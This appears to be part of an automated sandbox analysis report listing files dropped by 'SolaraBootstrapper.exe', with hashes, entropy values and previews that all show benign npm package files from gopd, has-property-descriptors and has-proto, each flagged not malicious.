                                                  Preview:'use strict';..var test = require('tape');.var gOPD = require('../');..test('gOPD', function (t) {..t.test('supported', { skip: !gOPD }, function (st) {...st.equal(typeof gOPD, 'function', 'is a function');....var obj = { x: 1 };...st.ok('x' in obj, 'property exists');....var desc = gOPD(obj, 'x');...st.deepEqual(....desc,....{.....configurable: true,.....enumerable: true,.....value: 1,.....writable: true....},....'descriptor is as expected'...);....st.end();..});...t.test('not supported', { skip: gOPD }, function (st) {...st.notOk(gOPD, 'is falsy');....st.end();..});...t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):173
                                                  Entropy (8bit):4.796475828044818
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hf5NeVHDQLjXiVHM+OL+/FpHLL8/EzlvwR/6Csl6LrNTsvv:ExL0UxNSHQytEL2pLL8alJCslur23
                                                  MD5:40BB4227BE5F1A2E10D29B56FC9F4564
                                                  SHA1:8EBD3827D942EBE47BDE38D41D8CDEA43D4EA620
                                                  SHA-256:3C44806873D9CEBEA2128BDB0ED0A00BD82BEC5B1DEBEA514BC54670D9F4859D
                                                  SHA-512:6E2F599E5D59C7F61695B495DB5D4B9B72C967DC2923962C6B0F29FBD5A4C615211AA61B8EAA6E3739E2C18CE310298C9EB4EF788A1E1443AF13C4FA8E19FFFD
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."func-name-matching": 0,..."id-length": 0,..."new-cap": [2, {...."capIsNewExceptions": ["GetIntrinsic"],...}],..},.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):595
                                                  Entropy (8bit):4.702186429158408
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMGPllgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mg5lg7g1GegJ9gEz4D
                                                  MD5:F3C02F6B204438228C428225140C5FC7
                                                  SHA1:046F43546078DA343B5F33026295643365CDCAB9
                                                  SHA-256:AAC113D18C37526F0D5D92F28D9BE805D85037520E9D4B822A20CFE71D9ACD40
                                                  SHA-512:DE98A476CD43E7DCA0E84703A2BDD4831F7F45CB27432794F8DCC560B8EF6DC2967328C48A83B00A2FFB7C9552747BD669C1208ED5AC3BA3CD71E4A1A201C453
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/has-property-descriptors.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):139
                                                  Entropy (8bit):4.461548676043605
                                                  Encrypted:false
                                                  SSDEEP:3:uFx3jG9UDHfa7aBA9c4RIeeFHqpvc9PNUaUifEIkHJ03WhBK:Kw9OfyFdRaB9LUiMIOJHhBK
                                                  MD5:D0104F79F0B4F03BBCD3B287FA04CF8C
                                                  SHA1:54F9D7ADF8943CB07F821435BB269EB4BA40CCC2
                                                  SHA-256:997785C50B0773E5E18BF15550FBF57823C634FEFE623CD37B3C83696402AD0A
                                                  SHA-512:DAF9B5445CFC02397F398ADFA0258F2489B70699DFEC6CA7E5B85AFE5671FDCABE59EDEE332F718F5E5778FEB1E301778DFFE93BB28C1C0914F669659BAD39C6
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2648
                                                  Entropy (8bit):5.216984831640945
                                                  Encrypted:false
                                                  SSDEEP:48:E5yEp+nE191N4uadYuyKsdReBtwl3SJ9pR/CTh:E5yEME17naZVsl3M9pR/eh
                                                  MD5:DFEAA41492DD9056087D1A2D60167499
                                                  SHA1:232017BB97B31DB28E230E4CBAD7AED30E77F1A7
                                                  SHA-256:0FE548702D98DAC2C17E3049B83EBB62953EF585EF88619F24EF71952688CC9D
                                                  SHA-512:3F3C6989530C087D3888E58F25DE26567CB8321F218F301C36C2D0F05C2072D4A5E6850AA1304115CA3CEE47BA67DFA2D44233CA8F2CC404F4F9431366690E8D
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.0.2](https://github.com/inspect-js/has-property-descriptors/compare/v1.0.1...v1.0.2) - 2024-02-12..### Commits..- [Refactor] use `es-define-property` [`f93a8c8`](https://github.com/inspect-js/has-property-descriptors/commit/f93a8c85eba70cbceab500f2619fb5cce73a1805).- [Dev Deps] update `aud`, `npmignore`, `tape` [`42b0c9d`](https://github.com/inspect-js/has-property-descriptors/commit/42b0c9d1c23e747755f0f2924923c418ea34a9ee).- [Deps] update `get-intrinsic` [`35e9b46`](https://github.com/inspect-js/has-property-descriptors/commit/35e9b46a7f14331bf0de98b644dd803676746037)..## [v1.0.1](https://github.com/inspect-js/has-property-descriptors/compare/v1.0.0...v1.0.1) - 2023-10-20..### Commits..- [meta] use `npmignore` to autogenerate an
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1067
                                                  Entropy (8bit):5.095025073213139
                                                  Encrypted:false
                                                  SSDEEP:24:/rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:/aJHlxE3dQHOs5exm3ogFh
                                                  MD5:D237EAC07663BDE2409DE740BA75EC97
                                                  SHA1:74CEE463C60DE7E0BFD342362E2A4DDF5F1883D9
                                                  SHA-256:0F0CA96F50793990031EBC488A38F7292FF70BCE8AB6A8E5EEDA674ABC32CCDF
                                                  SHA-512:D7A2F0DAC429ABC40834B1887CBFFEC6487330328AEFED4A84ED2DA8FCD687A489C7E25C981B99EF0EC5C0B71EFBF6C30489D8204F295045AFAA488DD98D644E
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2022 Inspect JS..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTI
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2206
                                                  Entropy (8bit):4.946265434655978
                                                  Encrypted:false
                                                  SSDEEP:48:81eI4IFO2sfqaFmNGm32qv+HsEIL0IDIJv:UXFbac3zLxUh
                                                  MD5:67A4620B357B10EE5A7B64D1172F583B
                                                  SHA1:12178C626C011BF0FB768984E6C1ED5AD53C9261
                                                  SHA-256:948751362D23B03B9A2FCEFC39F6B6F379F7A2B79B25DEAF21CBE0512131CFF0
                                                  SHA-512:43207C544CB32E3874E2ED2F23D411365BF21E04A4F71FC322BBDBFAFD866105941D98D744B567B93652D94C5D6121A6F2B6ACC76C9014F450B7E987051CF4B9
                                                  Malicious:false
                                                  Preview:# has-property-descriptors <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![dependency status][deps-svg]][deps-url].[![dev dependency status][dev-deps-svg]][dev-deps-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..Does the environment have full property descriptor support? Handles IE 8's broken defineProperty/gOPD...## Example..```js.var hasPropertyDescriptors = require('has-property-descriptors');.var assert = require('assert');..assert.equal(hasPropertyDescriptors(), true); // will be `false` in IE 6-8, and ES5 engines..// Arrays can not have their length `[[Defined]]` in some engines.assert.equal(hasPropertyDescriptors.hasArrayLengthDefineBug(), false); // will be `true` in Firefox 4-22, and node v0.6.```..## Tests.Simply clone the repo, `npm install`, and run `npm test`..[package-url]: http
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):588
                                                  Entropy (8bit):4.921338981139349
                                                  Encrypted:false
                                                  SSDEEP:12:zSDBLhoZJ6KFU+ko940WykAqVQlLwRZI0vTBgCR:zSE6G40WLAqewa0rBh
                                                  MD5:A8C2D4EA312A1DE8D1FA3DBF93AAA444
                                                  SHA1:6339A30DE7B7C821258F7C446DAF1260A0524DFD
                                                  SHA-256:D5415D5957DE8E923FB1A976CB3F2524F1800ECF5E3B958A4D76183D2A9DEE91
                                                  SHA-512:9B8F5C2F05306E4446B98EBF07EBE2761B2FD8F4DF4FE5ABE56F9F8856185AC8FEAF545355E9C36822BAA3673EEB2AC643C49B06F72DACC788C611A7E5FA4865
                                                  Malicious:false
                                                  Preview:'use strict';..var $defineProperty = require('es-define-property');..var hasPropertyDescriptors = function hasPropertyDescriptors() {..return !!$defineProperty;.};..hasPropertyDescriptors.hasArrayLengthDefineBug = function hasArrayLengthDefineBug() {..// node v0.6 has a bug where array lengths can be Set but not Defined..if (!$defineProperty) {...return null;..}..try {...return $defineProperty([], 'length', { value: 1 }).length !== 1;..} catch (e) {...// In Firefox 4-22, defining length on an array throws an exception....return true;..}.};..module.exports = hasPropertyDescriptors;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2090
                                                  Entropy (8bit):5.120875548329483
                                                  Encrypted:false
                                                  SSDEEP:48:1elq7RYCZU547agW01yRYsEg40EssiSowg:1VeC9Lv30EhiN
                                                  MD5:510168F5C4C087586D843E93CC695783
                                                  SHA1:A3E6C1869A4E2F16574906FEA431CE7A4BC1A022
                                                  SHA-256:59A91E2CF32E4303D248708999A9EC3AFD8E3649A87BA7ABCF2177DC1984E3D5
                                                  SHA-512:6AE33AF0F4F87F90C4824824566944EF3753360CCE74979D532BBCC98D995AEAF270AE7E79D6B3A59D6CAE6F2989250C7A3D84A333B52B6CA4CC762401D6C046
                                                  Malicious:false
                                                  Preview:{.."name": "has-property-descriptors",.."version": "1.0.2",.."description": "Does the environment have full property descriptor support? Handles IE 8's broken defineProperty/gOPD.",.."main": "index.js",.."exports": {...".": "./index.js",..."./package.json": "./package.json"..},.."sideEffects": false,.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublishOnly": "safe-publish-latest",..."prepublish": "not-in-publish || npm run prepublishOnly",..."pretest": "npm run lint",..."prelint": "evalmd README.md",..."lint": "eslint --ext=js,mjs .",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."type": "git",..."url": "git+https://github.com/inspect-js/has-p
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1405
                                                  Entropy (8bit):4.953599029639864
                                                  Encrypted:false
                                                  SSDEEP:24:ji/J/JpEmeQklInZnWck6XxthnnZ1Qrtbf/lf9MKWPGW:ji17ETInZnWcf3nZ1iB10eW
                                                  MD5:7A5F187740D31852A4063B9E66688A98
                                                  SHA1:1845271C79EC0BEE55B2D17ADED5FA39C32D4166
                                                  SHA-256:00B7CCD4FB74B70387244E1C0774CB75192CDAEA8FBA3A6809C7CF2C28885155
                                                  SHA-512:6CB4D06E7503C4B3BDD0DF1D12DD9E8C63362C594AEC309EF1349E54995E111748E37FC7F218BDA053BAFBB4A82FFD341F58E80BEC3CB3DB5D156C40F3CD4C26
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');..var hasPropertyDescriptors = require('../');..var sentinel = {};..test('hasPropertyDescriptors', function (t) {..t.equal(typeof hasPropertyDescriptors, 'function', 'is a function');..t.equal(typeof hasPropertyDescriptors.hasArrayLengthDefineBug, 'function', '`hasArrayLengthDefineBug` property is a function');...var yes = hasPropertyDescriptors();..t.test('property descriptors', { skip: !yes }, function (st) {...var o = { a: sentinel };....st.deepEqual(....Object.getOwnPropertyDescriptor(o, 'a'),....{.....configurable: true,.....enumerable: true,.....value: sentinel,.....writable: true....},....'has expected property descriptor'...);....Object.defineProperty(o, 'a', { enumerable: false, writable: false });....st.deepEqual(....Object.getOwnPropertyDescriptor(o, 'a'),....{.....configurable: true,.....enumerable: false,.....value: sentinel,.....writable: false....},....'has expected property descriptor after [[Define]]'...);....st.end();..});...v
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):43
                                                  Entropy (8bit):4.231286196905489
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hg:ExL0UA
                                                  MD5:C28B0FE9BE6E306CC2AD30FE00E3DB10
                                                  SHA1:AF79C81BD61C9A937FCA18425DD84CDF8317C8B9
                                                  SHA-256:0694050195FC694C5846B0A2A66B437AC775DA988F0A779C55FB892597F7F641
                                                  SHA-512:E3ECA17804522FFA4F41E836E76E397A310A20E8261A38115B67E8B644444153039D04198FB470F45BE2997D2C7A72B15BD4771A02C741B3CBC072EA6EF432E9
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):580
                                                  Entropy (8bit):4.69941916662743
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMGplgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mgllg7g1GegJ9gEz4D
                                                  MD5:D426B8452C9A77C2FC8605D26F89BC3E
                                                  SHA1:AC9924D2F28E9E39CEDFB42BC3E6B225C1ECBEE7
                                                  SHA-256:E9176304FF0A6EEFB1F367C6E817EC39120887A1C81A02B4070698469C5A05DC
                                                  SHA-512:E794F8E700E98D0BA08A02F617E59C37DD7D7B3C816766EE8B5FF7FF20F9D995879789B883279A84273980250B11E8942683DB012AEC5CB1C8B8F53111945EB9
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/has-proto.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2200
                                                  Entropy (8bit):5.267121454840437
                                                  Encrypted:false
                                                  SSDEEP:24:EIKpjXWTIppWAlnwRatzUI5tqNyk5CfA4We07eUZf/4HnWEf4G9/iuMdPnzG5Srq:E5yEpgFCABUf4GMratX9u0
                                                  MD5:C7C043D2B99E62E36D7D4B1CAAAABA31
                                                  SHA1:9F889EBEA4C24177B1DC36DD4D8614EB3CB1DC2A
                                                  SHA-256:B40A780CB2E0895F19EC3A3E8F49DD2C5F176B77B780AE31BBE7A37FF612F3A6
                                                  SHA-512:8B1003A752E73DB81E42DF56C7A9042AD8158809DF348194BC88FD0FE03009F1380A5CFEC048200DF7A2D691BB650309488B40393BBAA427181DF27D93A1D29C
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.0.3](https://github.com/inspect-js/has-proto/compare/v1.0.2...v1.0.3) - 2024-02-19..### Commits..- [types] add missing declaration file [`26ecade`](https://github.com/inspect-js/has-proto/commit/26ecade05d253bb5dc376945ee3186d1fbe334f8)..## [v1.0.2](https://github.com/inspect-js/has-proto/compare/v1.0.1...v1.0.2) - 2024-02-19..### Commits..- add types [`6435262`](https://github.com/inspect-js/has-proto/commit/64352626cf511c0276d5f4bb6be770a0bf0f8524).- [Dev Deps] update `@ljharb/eslint-config`, `aud`, `npmignore`, `tape` [`f16a5e4`](https://github.com/inspect-js/has-proto/commit/f16a5e4121651e551271419f9d60fdd3561fd82c).- [Refactor] tiny cleanup [`d1f1a4b`](https://github.com/inspect-js/has-proto/commit/d1f1a4bdc135f115a10f148ce302
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1067
                                                  Entropy (8bit):5.095025073213139
                                                  Encrypted:false
                                                  SSDEEP:24:/rmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:/aJHlxE3dQHOs5exm3ogFh
                                                  MD5:D237EAC07663BDE2409DE740BA75EC97
                                                  SHA1:74CEE463C60DE7E0BFD342362E2A4DDF5F1883D9
                                                  SHA-256:0F0CA96F50793990031EBC488A38F7292FF70BCE8AB6A8E5EEDA674ABC32CCDF
                                                  SHA-512:D7A2F0DAC429ABC40834B1887CBFFEC6487330328AEFED4A84ED2DA8FCD687A489C7E25C981B99EF0EC5C0B71EFBF6C30489D8204F295045AFAA488DD98D644E
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2022 Inspect JS..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTI
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1623
                                                  Entropy (8bit):4.94834013151433
                                                  Encrypted:false
                                                  SSDEEP:24:sdn1eI4IjAoqSsJRCMt4bjzaY795o/s/u98IJ1heIRIjvPvv:C1eI4I7qRVgWo/RIL0IRIjv
                                                  MD5:70803FBC3D0A3A7493AA3B5C90D13642
                                                  SHA1:F5F690EDC9957E0D5E870CA0FDC56545A0D2AE26
                                                  SHA-256:B287AD12C573D4283CFAC523F31D566F0DC72153E3290466BCBD5CE6676FDE2C
                                                  SHA-512:1F9E0A2B45C4905C38B4A02993B0E6E877F682802156FF938F893E823B34CD856B4CE8563539E0B0768AD939EF6799DEE80BA206B13E02285900F9E6AE4FD776
                                                  Malicious:false
                                                  Preview:# has-proto <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..Does this environment have the ability to set the [[Prototype]] of an object on creation with `__proto__`?..## Example..```js.var hasProto = require('has-proto');.var assert = require('assert');..assert.equal(typeof hasProto(), 'boolean');.```..## Tests.Simply clone the repo, `npm install`, and run `npm test`..[package-url]: https://npmjs.org/package/has-proto.[npm-version-svg]: https://versionbadg.es/inspect-js/has-proto.svg.[deps-svg]: https://david-dm.org/inspect-js/has-proto.svg.[deps-url]: https://david-dm.org/inspect-js/has-proto.[dev-deps-svg]: https://david-dm.org/inspect-js/has-proto/dev-status.svg.[dev-deps-url]: https://david-dm.org/inspect-js/has-proto#info=devDependencies.[npm-badge
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):57
                                                  Entropy (8bit):4.3177228566805255
                                                  Encrypted:false
                                                  SSDEEP:3:nPXbrMmEXKBi0W1on:TYzXQiin
                                                  MD5:CABA6E33B83260CCB5C6AC6EC4D088D0
                                                  SHA1:79B851A603F99F68A5D89BB8D1C5AF5630B55FE2
                                                  SHA-256:29ED67590964F520AED83494876AE2D880B286B18527F0D9C0BA48803C52EA54
                                                  SHA-512:8129D17D8CFB5B7DD7A36B6F8E6B260B72B84D5AACE3B27627020D09E84386278A8C050A1354CCC1DC313622305C9A52F6A9F1412935355254ED850CBAA55A86
                                                  Malicious:false
                                                  Preview:declare function hasProto(): boolean;..export = hasProto;
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):302
                                                  Entropy (8bit):4.855199516211327
                                                  Encrypted:false
                                                  SSDEEP:6:QcAmb8XqqPCVWKfzBvYmGYr+XqXJL+KPHWfVMMj5PtDJNvGbOAw:jPEqqsfzB7rjXFLPHW9H5PtDXGbOr
                                                  MD5:6E64FB0AA43856E2353BC04AFD460EEB
                                                  SHA1:4E953888F7D320D20235F1DB8791EEEB2302570C
                                                  SHA-256:FB19C1BA8B8270A4D99D5E714A5AEEA0B20465862CD9E9F4D18D0D95F44B380C
                                                  SHA-512:908D671D45F764FA77368FDEF21C9541BBAE98DDC1C955295CCD1F6501F3D3C89B9D46FB906A22AE15E8AD9DC71590F2BB6E40036D78901F9732B1135F241CC3
                                                  Malicious:false
                                                  Preview:'use strict';..var test = {..__proto__: null,..foo: {}.};..var $Object = Object;../** @type {import('.')} */.module.exports = function hasProto() {..// @ts-expect-error: TS errors on an inherited property for some reason..return { __proto__: test }.foo === test.foo...&& !(test instanceof $Object);.};.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2004
                                                  Entropy (8bit):5.10717712101436
                                                  Encrypted:false
                                                  SSDEEP:48:1MfsMRYCZU547ag/fIRYsEg4jCoa3+XRsdEmfSowg:1M0C9xb3jCoa3+XR6fN
                                                  MD5:CCB4058E21EB78DD88D3A003DC3CC489
                                                  SHA1:6CA0A0F4F54EE4444E0FAED74F99FAA76A9F52BD
                                                  SHA-256:30502A11630AA5653C55AC39885E3AEB0F7BFD85D6EED1D2BEC2A00B7F6A1109
                                                  SHA-512:1A6099515F97E62D1F1CA6F2E4CB6E1D11BE8051318836C3111C863D0F7984CB04E76565178CA8F9940022BBDFA6E498A985E0227451DF4BD3A65D767C149ED4
                                                  Malicious:false
                                                  Preview:{.."name": "has-proto",.."version": "1.0.3",.."description": "Does this environment have the ability to get the [[Prototype]] of an object on creation with `__proto__`?",.."main": "index.js",.."exports": {...".": "./index.js",..."./package.json": "./package.json"..},.."sideEffects": false,.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublishOnly": "safe-publish-latest",..."prepublish": "not-in-publish || npm run prepublishOnly",..."lint": "eslint --ext=js,mjs .",..."postlint": "tsc -p .",..."pretest": "npm run lint",..."tests-only": "tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."type": "git",..."url": "git+https://github.com/inspect-js/has-proto.git"..},.."keywor
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):477
                                                  Entropy (8bit):4.81749295695614
                                                  Encrypted:false
                                                  SSDEEP:6:QcALFElFu0BqRpZtAJRojSd/tyiArR1hbGyGQI5fRuUygfLzRr9/EEjlIzeTS:jSouldyJRojw4xmQ6JuEL99nlqeW
                                                  MD5:74A701DD99ACAAEA016EF7607B6C8E6F
                                                  SHA1:68F0871975E1D73A0244981E23325006FE9F2D8C
                                                  SHA-256:9A3B014D9A41F895886B42A9E7B71C21C56F52840B3439B555438C1E89F68897
                                                  SHA-512:136F2A3363EEE8349A9A9F195E3AC0B91F96E7CE7DE53762222B2265153528B93A87252FBF8F4756F8067996CF6A6A6D319DE7235E184652DCEF137428215B97
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');.var hasProto = require('../');..test('hasProto', function (t) {..var result = hasProto();..t.equal(typeof result, 'boolean', 'returns a boolean (' + result + ')');...var obj = { __proto__: null };..if (result) {...t.notOk('toString' in obj, 'null object lacks toString');..} else {...t.ok('toString' in obj, 'without proto, null object has toString');...t.equal(obj.__proto__, null); // eslint-disable-line no-proto..}...t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3611
                                                  Entropy (8bit):4.147019083760396
                                                  Encrypted:false
                                                  SSDEEP:48:x80prTY8LBtkyo/8iDloqIcofzT9gOvLz6Do30TpGiyU8vG:BvB28yoqKNNS0kwZU8vG
                                                  MD5:28078909413979BA4F10E7CC5387E4F4
                                                  SHA1:9523D0B767DA3D695A77A01C05AC3320727E8B39
                                                  SHA-256:B772FC0E85FE374BB32302CDBC08C8854D6A679BCF7F4F7B8DA28098E2979521
                                                  SHA-512:7E19237E46CF2E77EADB44CA64EA173A48C83CFB84FA1CDFABD1DCA699BFAAE74D749B39B705A4ADE4AF05FD0CFC8D6563E7C1D0B86DAB11D01B6038D0DD541C
                                                  Malicious:false
                                                  Preview:{. "compilerOptions": {. /* Visit https://aka.ms/tsconfig to read more about this file */.. /* Projects */.. /* Language and Environment */. "target": "ESNext", /* Set the JavaScript language version for emitted JavaScript and include compatible library declarations. */. // "lib": [], /* Specify a set of bundled library declaration files that describe the target runtime environment. */. // "noLib": true, /* Disable including any library files, including the default lib.d.ts. */. "useDefineForClassFields": true, /* Emit ECMAScript-standard-compliant class fields. */. // "moduleDetection": "auto", /* Control what method is used to detect module-format JS files. */.. /* Modules */. "module": "commonjs", /* Specify what module code is generated. */. // "rootDir": "./",
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):164
                                                  Entropy (8bit):4.656887119948345
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hf5NeVHI0FEmpRERZGbty4ni6AXWHfFpHIcR7GTIGDJGv:ExL0UxNSHIt2RI0tyZrQnkzV4
                                                  MD5:117C2ABA69B8C17D3AD9957665A0C13F
                                                  SHA1:F77BD5556F623A993A67C463DEBDC0C69178BFCB
                                                  SHA-256:15B0BD2D80EE6D32AF3C8761FC9007606A5EC9CF605E4CA2A214EEF8BE564FCE
                                                  SHA-512:FE3B4D9962410A8B067191702FB83C620BCCF15EB5930D40FC4BF7011954E5DFAC282CBBBA5A3D70396CB493F4F3BBAB02D0E0204C0CC419D5D6A8C8ADFF7136
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."max-statements-per-line": [2, { "max": 2 }],..."no-magic-numbers": 0,..."multiline-comment-style": 0,..}.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):582
                                                  Entropy (8bit):4.705597712370831
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMGvGplgM01bZBgMoGbQjgMy9gMLz4MI:qoQWAg0g+H0mgClg7g1GegJ9gEz4D
                                                  MD5:534BD30C05DFCF5B2DAE9ABECE5FC14C
                                                  SHA1:5AD12F14810DF4B34EFD7A55407041FE91967DE3
                                                  SHA-256:E777D06BAFDCD1D459ABCBDC03AC52357B59C248614DC6143D8D02EBFB4AEF15
                                                  SHA-512:132BCEE4EA7ABA788C26C4E09C3260567CBD139321338D4C93EE4CC93B1E87238A0AFBAD7FAE063F8022E8E227E0FED3A5F2924BBF6E861AAE7274FDA3152574
                                                  Malicious:false
